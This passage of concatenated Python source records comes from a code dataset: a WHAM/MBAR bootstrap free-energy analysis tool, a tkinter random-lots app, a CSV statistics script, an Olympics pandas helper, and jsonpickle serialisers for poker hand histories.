n_samples):\n\n # sub sample the bias matrix according to the number of uncorrelated samples from each window\n\n n_windows = n_samples.size\n\n ## Number of samples for each window, after selecting n_uncorr_sample of block size for each window\n n_blocked_sample = uncorr_n_samples*autocorr_blocks\n\n # sanity\n assert n_blocked_sample.sum() <= n_samples.sum()\n\n uncorr_bias_mat = np.zeros((n_blocked_sample.sum(), n_windows), dtype=np.float32)\n start_idx = 0\n uncorr_start_idx = 0\n subsampled_indices = np.array([], dtype=int)\n\n np.random.seed()\n\n # number of blocks (of size autocorr_blocks[i]) we'll select from this window\n for i, this_n_blocks in enumerate(uncorr_n_samples):\n \n this_block_size = autocorr_blocks[i]\n # the total number of (correlated) datapoints for this window\n this_n_sample = n_samples[i]\n\n 
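# The sampling loop below is a moving-block bootstrap: rather than drawing
# single (autocorrelated) frames, it draws contiguous blocks whose length is
# roughly the window's autocorrelation time, so short-range correlation inside
# each window is preserved. A minimal standalone sketch of the same
# index-selection idea (the helper name and rng choice are illustrative,
# not from this file):
def moving_block_indices(n_sample, block_size, n_blocks, seed=None):
    import numpy as np
    rng = np.random.default_rng(seed)
    # valid block starts leave room for a full block at the end of the window
    starts = rng.integers(0, n_sample - block_size + 1, size=n_blocks)
    return np.concatenate([np.arange(s, s + block_size) for s in starts])
# e.g. moving_block_indices(1000, block_size=50, n_blocks=20) returns 1000
# indices in [0, 1000), drawn 50 at a time as contiguous runs.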
## Number of blocks times block size for this sample\n this_n_blocked_sample = n_blocked_sample[i]\n assert this_n_blocked_sample == this_n_blocks * this_block_size\n\n ## Possible starting indices for each block - these are local\n avail_indices = np.arange(this_n_sample-this_block_size+1)\n # Global indices of this window we have to choose from\n total_indices = start_idx + np.arange(this_n_sample)\n\n # (local) starting and ending indices for each block\n this_start_indices = np.random.choice(avail_indices, size=this_n_blocks, replace=True)\n this_end_indices = this_start_indices + this_block_size\n\n ## Now make up the indices of this bootstrap subsample\n this_indices = np.array([], dtype=int)\n for this_start, this_end in zip(this_start_indices, this_end_indices):\n this_indices = np.append(this_indices, total_indices[slice(this_start, this_end)])\n\n assert this_indices.min() >= start_idx\n assert this_indices.max() < start_idx + this_n_sample\n\n assert this_indices.size == this_n_blocked_sample\n\n subsampled_indices = np.append(subsampled_indices, this_indices)\n\n uncorr_bias_mat[uncorr_start_idx:uncorr_start_idx+this_n_blocked_sample, :] = bias_mat[this_indices, :]\n \n uncorr_start_idx += this_n_blocked_sample\n start_idx += this_n_sample\n\n\n return (uncorr_bias_mat, subsampled_indices)\n\n\n# Do a batch of bootstrap subsampling\ndef _bootstrap(lb, ub, bias_mat, uncorr_n_samples, autocorr_blocks, n_samples, \n ones_m, ones_n, xweights, all_data, all_data_aux, boot_fn=None):\n \n # Number of bootstrap runs to do this round\n batch_size = ub - lb\n\n n_windows = n_samples.size\n assert n_windows == uncorr_n_samples.size == autocorr_blocks.size\n\n ## Number of samples for each window, after selecting n_uncorr_sample of block size for each window\n n_blocked_sample = uncorr_n_samples*autocorr_blocks\n\n\n # Results for this bootstrap batch\n f_k_ret = np.zeros((batch_size, n_windows), dtype=np.float32)\n boot_fn_ret = np.zeros(batch_size, dtype=object)\n\n # Subsampled indices for each bootstrap in this batch\n all_boot_indices = np.zeros((batch_size, n_blocked_sample.sum()), dtype=int)\n\n for batch_num in range(batch_size):\n\n ## Fill up the uncorrelated bias matrix\n boot_uncorr_bias_mat, boot_indices = _subsample(bias_mat, uncorr_n_samples, autocorr_blocks, n_samples)\n\n myargs = (boot_uncorr_bias_mat, n_blocked_sample/n_blocked_sample.sum(), n_blocked_sample.sum())\n boot_f_k = np.append(0, minimize(eval_fn, xweights, method='BFGS', jac=True, args=myargs).x)\n\n f_k_ret[batch_num,:] = boot_f_k\n all_boot_indices[batch_num,:] = boot_indices\n \n if boot_fn is not None:\n boot_logweights = gen_data_logweights(boot_uncorr_bias_mat, boot_f_k, n_samples, ones_m, ones_n[boot_indices])\n boot_fn_ret[batch_num] = boot_fn(all_data, all_data_aux, boot_indices, boot_logweights)\n del boot_logweights\n\n del boot_uncorr_bias_mat\n\n return (f_k_ret, boot_fn_ret, all_boot_indices, lb, ub)\n\n\nclass WHAMmer(ParallelTool):\n prog='WHAM/MBAR analysis'\n description = '''\\\nPerform MBAR/Binless WHAM analysis on 'phiout.dat' or '*.xvg' datasets (e.g. 
from alchemical FE cals with GROMACS).\nNote that XVG type datasets must contain DeltaU for *every* other window (not just the adjacent window(s), as\n is required by 'g_bar', which uses TI, not MBAR).\n\nAlso perform bootstrapping standard error analysis - must specify an autocorrelation time for this to work correctly!\n\nThis tool supports parallelization (see options below)\n\n\n-----------------------------------------------------------------------------\nCommand-line options\n-----------------------------------------------------------------------------\n'''\n \n def __init__(self):\n super(WHAMmer,self).__init__()\n \n # Parallel processing by default (this is not actually necessary, but it is\n # informative!)\n self.wm_env.default_work_manager = self.wm_env.default_parallel_work_manager\n\n self.beta = 1\n\n self.n_bootstrap = None\n\n self.output_filename = None\n\n self.start_weights = None\n\n self.boot_fn = None\n \n self.data_extractor = None\n\n self.db = None\n self.n_bins = None\n\n # Total number of samples - sum of n_samples from each window\n @property\n def n_tot(self):\n return self.n_samples.sum()\n \n \n def add_args(self, parser):\n \n sgroup = parser.add_argument_group('(Binless) WHAM/MBAR error options')\n sgroup.add_argument('input', metavar='INPUT', type=str, nargs='+',\n help='Input file names')\n sgroup.add_argument('--fmt', type=str, choices=['phi', 'pmf', 'alc', 'chi', 'both'], default='phi',\n help='Format of input data files: \\'phi\\' for phiout.dat; \\ '\n '\\'pmf\\' for PMF type files (specify kappa (kJ/mol*nm2), rstar in header); \\ '\n '\\'alc\\' for alchemical type files (each column k gives biasing potential for this datapoint under kth window); \\ '\n '\\'both\\' for phi AND chi data (in pairs, phidat first)')\n sgroup.add_argument('--phisub', action='store_true',\n help='If true, expect two phiout files per window (main volume and subvol, resp.)')\n sgroup.add_argument('--auxfiles', metavar='AUXINPUT', type=str, nargs='+',\n help='(Optional): Aux data file names, same number of data points as inputs')\n sgroup.add_argument('-b', '--start', type=int, default=0,\n help='first timepoint (in ps) - default is first available time point') \n sgroup.add_argument('-e', '--end', type=int, default=None,\n help='last timepoint (in ps) - default is last available time point')\n sgroup.add_argument('--skip', type=int, default=None,\n help='Skip this many picoseconds from each dataset. 
--autocorr option WILL BE IGNORED if this option is used')
        sgroup.add_argument('-T', metavar='TEMP', type=float,
                            help='convert Phi values to kT, for TEMP (K)')
        sgroup.add_argument('--bootstrap', type=int, default=1000,
                            help='Number of bootstrap samples to perform')
        sgroup.add_argument('--autocorr', '-ac', type=float, help='Autocorrelation time (in ps); this can be \\ '
                            'a single float, or one for each window')
        sgroup.add_argument('--autocorr-file', '-af', type=str,
                            help='Name of autocorr file (with times in ps for each window), if previously calculated')
        sgroup.add_argument('--n-bins', type=int, default=201, help='number of bins, if plotting prob dist (default 201)')
        sgroup.add_argument('--db', type=float, default=1.0, help='bin width, for KL tests')
        sgroup.add_argument('--start-weights', type=str, default=None,
                            help='(optional) previously calculated f_k file for INDUS simulations (starting weights, if known) - \\ '
                            'if \\'phi\\' format option also supplied, this will calculate the Pv(N) (and Ntwid). \\ '
                            'For \\'xvg\\' formats, this will calculate the probability distribution of whatever \\ '
                            'variable has been umbrella sampled')
        sgroup.add_argument('--boot-fn', default=None,
                            help='function, loaded from file of the form \\'module.function\\', to be performed \\ '
                            'during each bootstrap iteration. If provided, the function is called during each bootstrap as: \\ '
                            'fn(all_data, all_data_N, boot_indices, boot_logweights) where boot_indices corresponds to the indices \\ '
                            'of this selected bootstrap sample, and boot_logweights are the corresponding (log of) statistical weights \\ '
                            'for each bootstrap sample calculated with WHAM/MBAR.')

    ## Hackish way to 'inherit' attributes from the data extractor
    def __getattr__(self, attr):
        if self.data_extractor is not None:
            return getattr(self.data_extractor, attr)

    def process_args(self, args):

        self.beta = 1
        if args.T:
            self.beta /= (args.T * k)

        self.db = args.db
        self.n_bins = args.n_bins

        # Number of bootstrap samples to perform
        self.n_bootstrap = args.bootstrap

        if args.start_weights:
            self.start_weights = np.loadtxt(args.start_weights)
            log.info(\"starting weights: {}\".format(self.start_weights))

        if args.autocorr_file is not None:
            auto = args.autocorr_file
        else:
            auto = args.autocorr

        if args.auxfiles is not None:
            auxfiles = args.auxfiles
        else:
            auxfiles = None

        log.info(\"Extracting data...\")
        #embed()
        if args.fmt != 'both':
            self.data_extractor = WHAMDataExtractor(np.sort(args.input), auxinfiles=auxfiles, fmt=args.fmt, phisub=args.phisub, start=args.start, end=args.end, beta=self.beta)

        else:
            log.info(\"Extracting pairs of phi, chi data!!!\")
            log.info(\"WARNING: bootstrapping analysis is not yet implemented for 2D. 
Also, this may take a *long* time.\")\n self.data_extractor = WHAMDataExtractor(np.sort(args.input)[::2], auxinfiles=auxfiles, fmt='phi', phisub=args.phisub, start=args.start, end=args.end, beta=self.beta)\n chi_data_extractor = WHAMDataExtractor(np.sort(args.input)[1::2], fmt='chi', start=args.start, end=args.end, beta=self.beta)\n\n self.data_extractor.bias_mat += chi_data_extractor.bias_mat\n\n self.n_bootstrap = 0\n\n self.data_extractor.all_data = np.stack((self.data_extractor.all_data, chi_data_extractor.all_data)).T\n if auto is not None:\n min_idx = self.autocorr < auto\n self.autocorr[min_idx] = auto\n\n log.info(\"Tau for each window: {} ps\".format(self.autocorr))\n log.info(\"data time step: {} ps\".format(self.ts))\n log.info(\"autocorr nsteps: {}\".format(self.autocorr_blocks)) \n\n if args.boot_fn is not None:\n self.boot_fn = get_object(args.boot_fn)\n\n def go(self):\n #embed()\n if self.start_weights is not None:\n log.info(\"using initial weights: {}\".format(self.start_weights))\n f_k_sub = self.start_weights\n else:\n xweights = np.zeros(self.n_windows)\n\n assert xweights[0] == 0\n\n log.info(\"Quick sub-sampled MBAR run\")\n \n # Only grab n_uncorr_samples samples from each window for a quick WHAM run to get an initial guess\n # for weights {f_k}\n uncorr_bias_mat, subsampled_indices = _subsample_small(self.bias_mat, self.uncorr_n_samples, self.uncorr_n_tot, self.n_samples, self.n_windows)\n \n #myargs = (uncorr_bias_mat, self.uncorr_n_sample_diag, self.uncorr_ones_m, self.uncorr_ones_n, self.uncorr_n_tot)\n myargs = (uncorr_bias_mat, self.uncorr_n_samples / self.uncorr_n_tot, self.uncorr_n_tot)\n f_k_sub = minimize(eval_fn, xweights[1:], method='BFGS', args=myargs, jac=True).x\n #f_k_sub = minimize(kappa, xweights[1:], method='L-BFGS-B', args=myargs, jac=grad_kappa).x\n f_k_sub = np.append(0, f_k_sub)\n log.info(\"subsampled MBAR results: {}\".format(f_k_sub))\n\n log.info(\"Running MBAR on entire dataset\")\n log.info(\"...(this might take awhile)\")\n myargs = (self.bias_mat, self.n_samples / self.n_tot, self.n_tot)\n \n f_k_actual = minimize(eval_fn, f_k_sub[1:], method='BFGS', tol=1e-5, args=myargs, jac=True, callback=callbackF).x\n #f_k_actual = minimize(kappa, f_k_sub[1:], method='L-BFGS-B', args=myargs, jac=grad_kappa, callback=callbackF).x\n f_k_actual = np.append(0, f_k_actual)\n log.info(\"MBAR results on entire dataset: {}\".format(f_k_actual))\n\n np.savetxt('f_k_all.dat', f_k_actual, fmt='%3.6f')\n\n \n # Log of each datapoint's statistical weight. 
Note this accounts for statistical inefficiency in samples\n all_logweights = gen_data_logweights(self.bias_mat, f_k_actual, self.n_samples, self.ones_m, self.ones_n)\n \n \n np.savez_compressed('all_data.dat', logweights=all_logweights, data=self.all_data, data_aux=self.all_data_aux, bias_mat=self.bias_mat, n_samples=self.n_samples)\n #embed()\n # Now for bootstrapping...\n n_workers = self.work_manager.n_workers or 1\n #batch_size = self.n_bootstrap // n_workers\n batch_size = 1\n if self.n_bootstrap % n_workers != 0:\n batch_size += 1\n log.info(\"batch size for bootstrap: {}\".format(batch_size))\n\n # the bootstrap estimates of free energies wrt window i=0\n f_k_boot = np.zeros((self.n_bootstrap, self.n_windows), dtype=np.float32)\n boot_indices = np.zeros((self.n_bootstrap, (self.autocorr_blocks*self.uncorr_n_samples).sum()), dtype=int)\n # Results of hook function, if desired\n boot_res = np.zeros(self.n_bootstrap, dtype=object)\n\n def task_gen():\n \n if __debug__:\n checkset = set()\n for lb in range(0, self.n_bootstrap, batch_size):\n ub = min(self.n_bootstrap, lb+batch_size)\n \n if __debug__:\n checkset.update(set(range(lb,ub)))\n\n args = ()\n kwargs = dict(lb=lb, ub=ub, bias_mat=self.bias_mat, uncorr_n_samples=self.uncorr_n_samples, \n autocorr_blocks=self.autocorr_blocks, n_samples=self.n_samples, ones_m=self.ones_m,\n ones_n=self.ones_n,xweights=f_k_actual[1:], all_data=self.all_data,\n all_data_aux=self.all_data_aux, boot_fn=self.boot_fn)\n log.info(\"Sending job batch (from bootstrap sample {} to {})\".format(lb, ub))\n yield (_bootstrap, args, kwargs)\n\n\n log.info(\"Beginning {} bootstrap iterations\".format(self.n_bootstrap))\n # Splice together results into final array of densities\n for future in self.work_manager.submit_as_completed(task_gen(), queue_size=self.max_queue_len):\n f_k_slice, boot_res_slice, this_boot_indices, lb, ub = future.get_result(discard=True)\n log.info(\"Receiving result\")\n f_k_boot[lb:ub, :] = f_k_slice\n log.debug(\"this boot weights: {}\".format(f_k_slice))\n boot_res[lb:ub] = boot_res_slice\n boot_indices[lb:ub, :] = this_boot_indices\n del f_k_slice\n\n # Get SE from bootstrapped samples\n f_k_boot_mean = f_k_boot.mean(axis=0)\n f_k_se = np.sqrt(f_k_boot.var(axis=0))\n print('f_k (boot mean): {}'.format(f_k_boot_mean))\n print('f_k: {}'.format(f_k_actual))\n print('se: {}'.format(f_k_se))\n np.savetxt('err_f_k.dat', f_k_se, fmt='%3.6f')\n np.savetxt('boot_f_k.dat', f_k_boot)\n np.save('boot_indices.dat', boot_indices)\n\n print(\"saving bootstrap fn output...\")\n if self.boot_fn is not None:\n np.save('boot_fn_payload.dat', boot_res)\n\n log.info(\"Performing cross-entropy post-analysis\")\n print(\"...Done.\")\n \n bins = np.arange(np.floor(self.all_data.min()), np.ceil(self.all_data.max())+self.db, self.db)\n #bins = np.linspace(np.floor(self.all_data.min()), np.ceil(self.all_data.max()), self.n_bins)\n #embed()\n entropies = np.zeros(self.n_windows)\n\n fvn = get_negloghist(self.all_data, bins, all_logweights)\n mask = ~np.ma.masked_invalid(fvn).mask\n \n if self.fmt == 'phi': #or self.fmt == 'alc':\n\n for i, (data_slice, bias_slice) in enumerate(self.data_extractor.gen_obs_data()):\n #embed()\n this_n_sample = self.n_samples[i]\n obs_hist, _ = np.histogram(data_slice, bins=bins)\n occ = obs_hist > 0\n this_mask = mask&occ\n\n if self.fmt == 'phi':\n this_kappa = self.kappas[i]\n this_nstar = self.Nstars[i]\n this_phi = self.phis[i]\n\n # Get consensus hist for this window\n bias_logweights = all_logweights - 
0.5*self.beta*this_kappa*(self.all_data - this_nstar)**2 - this_phi*self.all_data\n \n elif self.fmt == 'alc':\n bias_logweights = all_logweights - bias_slice\n\n bias_logweights -= bias_logweights.min()\n fvn_bias = get_negloghist(self.all_data, bins, bias_logweights)\n\n this_eta = (obs_hist / this_n_sample) * (np.log(obs_hist / this_n_sample) + fvn_bias)\n\n entropies[i] = this_eta[this_mask].sum()\n\n print(\"{}th window consensus: {:.2e}\".format(i, this_eta[this_mask].sum()))\n\n np.savetxt('kl_entropies.dat', np.dstack((self.kappas, self.Nstars, self.phis, entropies))[0], header='kappa(kJ/mol) Nstar phi(kJ/mol) KL_div')\n\n \n bins = np.arange(self.all_data_aux.max()+2)\n fvn = get_negloghist(self.all_data_aux, bins, all_logweights)\n mask = ~np.ma.masked_invalid(fvn).mask\n wt = np.exp(-fvn[mask])\n wt /= wt.sum()\n avg_n = np.dot(wt, bins[:-1][mask])\n avg_n_sq = np.dot(wt, bins[:-1][mask]**2)\n var_n = avg_n_sq - avg_n**2\n\n np.savetxt(\"fvn.dat\", np.stack((bins[:-1], fvn)).T, header='N beta Fv(N) : {:.2f} : {:.4f}'.format(avg_n, var_n), fmt='%f')\n\n\n elif self.fmt == 'alc':\n np.savetxt(\"fvn.dat\", np.stack((bins[:-1], fvn)).T)\n cum_n_samples = np.append(0, np.cumsum(self.n_samples))\n for i in range(self.n_windows):\n #embed()\n start_idx = cum_n_samples[i]\n end_idx = cum_n_samples[i+1]\n\n data_slice = self.all_data[start_idx:end_idx]\n this_n_sample = self.n_samples[i]\n obs_hist, _ = np.histogram(data_slice, bins=bins)\n occ = obs_hist > 0\n this_mask = mask&occ\n\n bias_logweights = all_logweights - self.bias_mat[:, i]\n\n bias_logweights -= bias_logweights.min()\n fvn_bias = get_negloghist(self.all_data, bins, bias_logweights)\n\n this_eta = (obs_hist / this_n_sample) * (np.log(obs_hist / this_n_sample) + fvn_bias)\n\n entropies[i] = this_eta[this_mask].sum()\n\n print(\"{}th window consensus: {:.2e}\".format(i, this_eta[this_mask].sum()))\n\n\n\nif __name__=='__main__':\n WHAMmer().main()\n\n\n \n","sub_path":"whamerr.py","file_name":"whamerr.py","file_ext":"py","file_size_in_byte":21675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"90247582","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom random import *\nfrom tkinter import filedialog\nfrom tkinter.filedialog import asksaveasfile\nimport copy\nre_get=0\ni=0\ngot_i=0\nroot=Tk()\nroot.iconbitmap(r'C:\\Users\\rina\\Downloads\\randomprogram--main\\tennoji.ico')\nlistbox=Listbox(root,selectmode=EXTENDED)\nlistbox_yougot=Listbox(root,selectmode=EXTENDED)\nroot.title(\"Rinachan Lots\")\nroot.geometry(\"700x700\")\nroot.resizable(0,0)\nkeys={}\nyougots={}\ndef download():\n if len(keys)==0:\n messagebox.showwarning(\"error!\", \"please input value more than 1.\")\n return\n f = asksaveasfile(mode='w', defaultextension=\".txt\")\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n k_keys=[]\n for kk in keys.keys():\n k_keys.append(int(kk))\n for i in range(len(k_keys)):\n text2save = keys[k_keys[i]]+'\\n'\n f.write(text2save)\n f.close()\ndef openfile():\n filename = filedialog.askopenfilename()\n\n fileHandle = open(filename, 'r')\n getFromFile=(fileHandle.read()).split('\\n')\n global i\n for j in range(len(getFromFile)):\n print(getFromFile[j])\n print(i)\n if(getFromFile[j]==''):\n continue\n newArray = []\n for z in keys.keys():\n newArray.append(int(z))\n newArray.sort()\n print(newArray)\n if i in newArray:\n i = 0\n for k in newArray:\n if (i == int(k)):\n i += 1\n elif (i != int(k)):\n break\n 
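# The scan above finds the smallest non-negative integer that is not already
# used as a key, so slots freed by deletions get reused; insert_fun repeats
# the same pattern. A minimal standalone sketch of the idea (the helper name
# is illustrative, not part of this file):
def next_free_key(used_keys):
    candidate = 0
    for k in sorted(int(x) for x in used_keys):
        if candidate == k:
            candidate += 1
        else:
            break
    return candidate
# e.g. next_free_key({0, 1, 3}) == 2 and next_free_key(set()) == 0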
print(i)\n keys[i] = getFromFile[j]\n listbox.insert(i, getFromFile[j])\n input_box.delete(\"0\", END)\n i += 1\n print(keys)\n\n fileHandle.close()\ndef random_select():\n if int(len(keys))==0:\n messagebox.showwarning(\"error!\", \"please input value more than 1.\")\n return\n global i\n check_value=[]\n for keysss in keys.keys():\n check_value.append(int(keysss))\n print(check_value)\n keys_value=check_value[randrange(0,len(check_value))]\n print(keys_value)\n newArray=[]\n global got_i\n for j in yougots.keys():\n newArray.append(int(j))\n if got_i in newArray:\n got_i=0\n print(\"hi\")\n for k in newArray:\n if(got_i==int(k)):\n got_i+=1\n elif(got_i!=int(k)):\n break\n global re_get\n re_get=check_value\n yougots[got_i]=keys[keys_value]\n listbox_yougot.insert(got_i,yougots[got_i])\n messagebox.showinfo(\"What You Get!\", keys[keys_value])\n var.set(f\"What You Got: {keys[keys_value]}\")\n got_i+=1\n print(keys.keys())\n print(1)\n\ndef delete_all():\n if int(len(keys))==0:\n messagebox.showwarning(\"error!\", \"lot box is empty!.\")\n return\n listbox.delete(0,END)\n global i\n i=0\n keys.clear()\ndef delete_button():\n try:\n selected = listbox.get(listbox.curselection())\n print(selected)\n global i\n i=i-1\n for key,value in keys.items():\n if value==selected:\n key_find=key\n del keys[key_find]\n listbox.delete(ANCHOR)\n except:\n return\n\ndef insert_fun(event):\n if(Entry.get(input_box)==\"\"):\n messagebox.showwarning(\"error!\",\"please input value\")\n return\n global i\n newArray=[]\n for j in keys.keys():\n newArray.append(int(j))\n newArray.sort()\n if i in newArray:\n print(\"3\")\n i=0\n for k in newArray:\n if(i==int(k)):\n\n i+=1\n elif(i!=int(k)):\n break\n\n keys[i]=Entry.get(input_box)\n listbox.insert( i,Entry.get(input_box))\n i = i + 1\n input_box.delete(\"0\",END)\n print(keys)\n\ninput_box = Entry(root, width=28)\nfileUpload_Button=Button(width=10,text=\"upload lots\",command=openfile)\nfileDownload_Button=Button(width=10,text=\"download lots\",command=download)\ndelete=Button(width=10,text=\"delete this\",command=delete_button)\ndelete.place(x=50,y=625)\nfileUpload_Button.place(x=160,y=650)\ndelete_all=Button(width=10,text=\"delete All\",command=delete_all)\nfileDownload_Button.place(x=50,y=650)\ndelete_all.place(x=160,y=625)\ninput_box.place(x=255,y=20)\nrandom=Button(width=10,text=\"Drawing Lots\",command=random_select)\nrandom.place(x=300,y=60)\nlistbox.place(x=50, y=100, width=200, height=500)\nlistbox_yougot.place(x=450,y=100,width=200,height=500)\nvar=StringVar()\nText_Slot=Label(root,textvariable=var,font=('Arial',10))\nText_Slot2=Label(root,text=\"Type and press enter!\",font=('Arial',10))\ndef delete_got():\n try:\n selected = listbox_yougot.get(listbox_yougot.curselection())\n print(selected)\n global got_i\n got_i=got_i-1\n for key,value in yougots.items():\n if value==selected:\n key_find=key\n del yougots[key_find]\n listbox_yougot.delete(ANCHOR)\n print(yougots.keys())\n except:\n return\n\ndelete_got=Button(width=10,text=\"delete this lot\",command=delete_got)\ndelete_got.place(x=450,y=625)\n\ndef delete_all_got():\n if int(len(yougots))==0:\n messagebox.showwarning(\"error!\", \"Drawing First!\")\n return\n listbox_yougot.delete(0,END)\n global got_i\n got_i=0\n yougots.clear()\ndelete_all_got=Button(width=10,text=\"delete all\",command=delete_all_got)\ndelete_all_got.place(x=570,y=625)\n\ndef download_yougot():\n if len(yougots) == 0:\n messagebox.showwarning(\"error!\", \"please draw!\")\n f = asksaveasfile(mode='w', 
defaultextension=\".txt\")\n    if f is None: # asksaveasfile returns `None` if dialog closed with \"cancel\".\n        return\n    got_kk=[]\n    for c in yougots.keys():\n        got_kk.append(int(c))\n    for i in range(len(yougots)):\n        text2save = yougots[got_kk[i]]+'\\n'\n        f.write(text2save)\n    f.close()\ndownload_got=Button(width=27,text=\"download those\",command=download_yougot)\ndownload_got.place(x=450,y=650)\nroot.bind('<Return>', insert_fun)\n\ndef swap_button():\n    if len(yougots)==0:\n        messagebox.showwarning(\"error!\", \"Drawing First!\")\n        return\n\n    global keys\n    keys.clear()\n    keys=copy.deepcopy(yougots)\n    listbox.delete(0, END)\n    global i\n    i=0\n    for k in range(len(yougots)):\n        listbox.insert(k, keys[k])\n        i=i+1\n\n\nswap_button=Button(width=15,text=\"<-move to lots\",command=swap_button)\nswap_button.place(x=280,y=265)\n\ndef swap_button2():\n    if len(keys)==0:\n        messagebox.showwarning(\"error!\", \"Input First!\")\n        return\n    global yougots\n    yougots.clear()\n    yougots = copy.deepcopy(keys)\n    listbox_yougot.delete(0, END)\n    global i\n    i = 0\n    for k in range(len(keys)):\n        listbox_yougot.insert(k, yougots[k])\n        i = i + 1\n\nswap_button=Button(width=15,text=\"move to lots->\",command=swap_button2)\nswap_button.place(x=280,y=300)\nText_Slot2.place(x=10,y=20)\nText_Slot.place(x=450,y=65)\nroot.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"140058494","text":"import csv\r\nfrom collections import Counter \r\n\r\nwith open(\"height-weight.csv\", newline=\"\") as f:\r\n    reader = csv.reader(f)\r\n    file_data = list(reader)\r\n\r\nfile_data.pop(0)\r\n\r\nheight_list = []\r\n\r\nfor i in range(len(file_data)):\r\n    num = file_data[i][1]\r\n    height_list.append(float(num))\r\n\r\nn = len(height_list)\r\nheight_list.sort()\r\n\r\ntotal = 0\r\n\r\nfor x in height_list:\r\n    total = total + x\r\n\r\nmean = total/n\r\n\r\nprint(mean)\r\n\r\nif n%2 == 0:\r\n    median1 = float(height_list[n//2])\r\n    median2 = float(height_list[n//2-1])\r\n    median = (median1 + median2)/2\r\nelse:\r\n    median = float(height_list[n//2])\r\n\r\nprint(median)\r\n\r\nnewdata = Counter(height_list)\r\n\r\ndata_range = {\r\n    \"50-60\": 0,\r\n    \"60-70\": 0,\r\n    \"70-80\": 0,\r\n}\r\n\r\n# bucket each height into its range\r\nfor height, occurance in newdata.items():\r\n    if 50 < height <= 60:\r\n        data_range[\"50-60\"] += occurance\r\n    elif 60 < height <= 70:\r\n        data_range[\"60-70\"] += occurance\r\n    elif 70 < height <= 80:\r\n        data_range[\"70-80\"] += occurance\r\n\r\n# find the range with the highest count (the modal range)\r\nmodeRandge, modeOccurance = [0, 0], 0\r\nfor range, occurance in data_range.items():\r\n    if occurance > modeOccurance:\r\n        modeRandge, modeOccurance = [int(range.split(\"-\")[0]), int(range.split(\"-\")[1])], occurance\r\n\r\nmode = float((modeRandge[0] + modeRandge[1]) //2)\r\n\r\nprint(mode)","sub_path":"workingwithcsv.py","file_name":"workingwithcsv.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"602524680","text":"# %load q02_country_operations/build.py\n# default imports\nfrom greyatomlib.olympics_project_new.q01_rename_columns.build import q01_rename_columns\n#Previous Functions\npath = './data/olympics.csv'\nOlympicsDF=q01_rename_columns(path) \ndef q02_country_operations(OlympicsDF=OlympicsDF):\n    newcolumlist = [ (str(x)).split('(',1)[0].replace(u'\xa0', u'') for x in OlympicsDF['Country']]\n    OlympicsDF['Country_Name']=newcolumlist\n    return OlympicsDF\nq02_country_operations()\n\n\n\n","sub_path":"q02_country_operations/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"87722727","text":"import jsonpickle\nfrom jsonpickle.handlers 
import BaseHandler\n\nfrom poker import Card, Combo\nfrom poker.handhistory import _BaseStreet, _BaseHandHistory, _Player, _PlayerAction\n\n\n@jsonpickle.handlers.register(Card, base=True)\nclass CardHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {'rank': obj.rank.val, 'suit': obj.suit.name}\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(Combo, base=True)\nclass ComboHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {'1': self.context.flatten(obj.first, reset=False), '2': self.context.flatten(obj.second, reset=False)}\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(_Player, base=True)\nclass PlayerHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data.clear()\n data = {'name': obj.name, 'stack': float(obj.stack), 'seat': obj.seat}\n if obj.combo is not None:\n data['hand'] = self.context.flatten(obj.combo, reset=False)\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(_PlayerAction, base=True)\nclass PlayerActionsHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {}\n data['name'] = obj.name\n data['action'] = obj.action.name\n if obj.amount is not None:\n data['amount'] = float(obj.amount)\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(_BaseStreet, base=True)\nclass StreetHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {}\n if obj.actions is not None:\n data['actions'] = [self.context.flatten(action, reset=False) for action in obj.actions]\n if obj.cards is not None:\n data['cards'] = [self.context.flatten(x, reset=False) for x in obj.cards]\n data['flushdraw'] = obj.has_flushdraw\n data['gutshot'] = obj.has_gutshot\n data['paired'] = obj.has_pair\n data['straightdraw'] = obj.has_straightdraw\n data['monotone'] = obj.is_monotone\n data['triplet'] = obj.is_triplet\n return data\n\n def restore(self, obj):\n raise NotImplementedError\n\n\n@jsonpickle.handlers.register(_BaseHandHistory, base=True)\nclass HandHistoryHandler(BaseHandler):\n\n def flatten(self, obj, data):\n data = {}\n data['timestamp'] = str(obj.date)\n data['id'] = int(obj.ident)\n data['tablename'] = obj.table_name\n data['bb'] = float(obj.bb)\n data['sb'] = float(obj.sb)\n data['game'] = str(obj.game)\n data['gametype'] = str(obj.game_type)\n data['limit'] = str(obj.limit)\n data['max-players'] = obj.max_players\n data['hero'] = obj.hero.name\n data['button'] = obj.button.name\n if obj.total_pot is not None:\n data['total_pot'] = float(obj.total_pot)\n if obj.rake is not None:\n data['rake'] = float(obj.rake)\n if obj.tournament_ident is not None:\n data['tournament-id'] = int(obj.tournament_ident)\n if obj.tournament_level is not None:\n data['tournament-level'] = str(obj.tournament_level)\n if obj.currency is not None:\n data['currency'] = str(obj.currency)\n if obj.extra is not None and obj.extra.get('money_type') is not None:\n data['moneytype'] = str(obj.extra.get('money_type'))\n data['players'] = [self.context.flatten(player, reset=True) for player in obj.players]\n\n if obj.preflop is not None:\n preflop_actions = [self.context.flatten(action, reset=False) for action in obj.preflop.actions]\n data['preflop'] = {'actions': preflop_actions}\n\n if obj.flop is not None:\n data['flop'] = self.context.flatten(obj.flop, reset=True)\n\n if obj.turn is not None:\n data['turn'] = self.context.flatten(obj.turn, reset=True)\n\n if 
